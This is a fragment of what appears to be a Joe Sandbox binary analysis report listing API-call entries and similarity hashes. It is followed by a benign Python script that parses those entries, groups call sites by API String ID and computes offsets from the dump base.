                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 7cecc098c889b7637f61f913aee70f1125c4048726d4c447a821df99a9e437f4
                                  • Instruction ID: a13460cf985236e5145384efc02fa3ed0300f60e874426fe9b6cb0eb1455203b
                                  • Opcode Fuzzy Hash: 7cecc098c889b7637f61f913aee70f1125c4048726d4c447a821df99a9e437f4
                                  • Instruction Fuzzy Hash: 971130B4A12B079BDB259F75D86C927B7F8FF44301709052DA896C7B80EB31E811CB94
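The function entries above are the part of the report that is useful for pivoting: "API String ID" identifies the API set plus string set a routine uses (the four lstrcpy-only string builders all carry 3722407311-0), the Opcode ID and fuzzy hashes identify the code itself, and each "ref" is a call-site address inside the dump whose load base is the "Offset:" value of the Source File line. What follows is an added example, not Joe Sandbox's own tooling or output: a small Python parser for this entry format, fed a trimmed copy of four entries from above (the Associated list is cut to one line), that splits the text into per-function records, groups direct call sites by API String ID, and converts a ref into an offset from the dump base so it can be matched against the unpacked PE. The helper names (parse_entries, direct_calls, calls_to, by_api_string_id, rva) are my own, and the regexes assume the line shapes seen in this report.

```python
import re
from collections import defaultdict

# Input copied (trimmed) from the function entries in this report. Four
# entries are kept; the long "Associated:" dump list is cut to one line.
SAMPLE = """\
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00317C94
• std::_Xinvalid_argument.LIBCPMT ref: 00317CAF
  • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D58
Strings
Memory Dump Source
• Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_file.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
APIs
• GetProcessHeap.KERNEL32(00000008,?), ref: 00306F74
• RtlAllocateHeap.NTDLL(00000000), ref: 00306F7B
Memory Dump Source
• Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: Heap$AllocateProcess
• String ID: @
• API String ID: 1357844191-2766056989
APIs
• lstrcpy.KERNEL32(00000000), ref: 003215A1
• lstrcpy.KERNEL32(00000000,?), ref: 003215D9
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
APIs
• lstrcpy.KERNEL32(00000000), ref: 0030162D
• lstrcpy.KERNEL32(00000000,?), ref: 0030164F
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
"""

# One API reference line, with or without an argument list, optionally
# prefixed by "Part of subcall function <addr>: " for calls made by a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\S+?)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
# Any other "Key: value" bullet (Source File, API ID, Opcode ID, ...).
KV_RE = re.compile(r"^(?P<key>[^:]+): ?(?P<value>.*)$")


def parse_entries(text):
    """Split the report text into one record per function ('APIs' header).

    Each record holds parsed call lines under "apis", Associated dump names
    under "associated", and every other "Key: value" field verbatim. Headers
    without a colon (Strings, Similarity, Yara matches, ...) are skipped.
    """
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur = {"apis": [], "associated": []}
            entries.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] is not None else []
            cur["apis"].append(call)
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m.group("key"), m.group("value").strip()
            if key == "Associated":
                cur["associated"].append(value)
            else:
                cur[key] = value
    return entries


def direct_calls(entry):
    """(API name, args) for calls the function makes itself, subcalls excluded."""
    return [(c["name"], c["args"]) for c in entry["apis"] if c["caller"] is None]


def calls_to(entries, api_name):
    """Direct call sites of one API across all entries as (entry index, ref)."""
    return [(i, c["ref"]) for i, e in enumerate(entries)
            for c in e["apis"] if c["name"] == api_name and c["caller"] is None]


def by_api_string_id(entries):
    """Group direct call-site refs by 'API String ID' (same API set, same strings)."""
    groups = defaultdict(list)
    for e in entries:
        sid = e.get("API String ID")
        if sid:
            groups[sid].extend(c["ref"] for c in e["apis"] if c["caller"] is None)
    return dict(groups)


def rva(entry, ref):
    """Offset of a call-site ref from the dump load base ('Offset:' in Source File)."""
    m = re.search(r"Offset: ([0-9A-Fa-f]+)", entry.get("Source File", ""))
    if not m:
        raise ValueError("entry has no Source File offset")
    return int(ref, 16) - int(m.group(1), 16)


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for sid, refs in by_api_string_id(recs).items():
        print(sid, refs)
    print(hex(rva(recs[1], "00306F74")))
```

Running it against a full report text instead of SAMPLE works unchanged; the "Download File" link text that some report exports glue to the Associated lines is harmless because those values are kept verbatim, and the grouping output shows immediately which functions share an API String ID and are therefore candidates for one template routine.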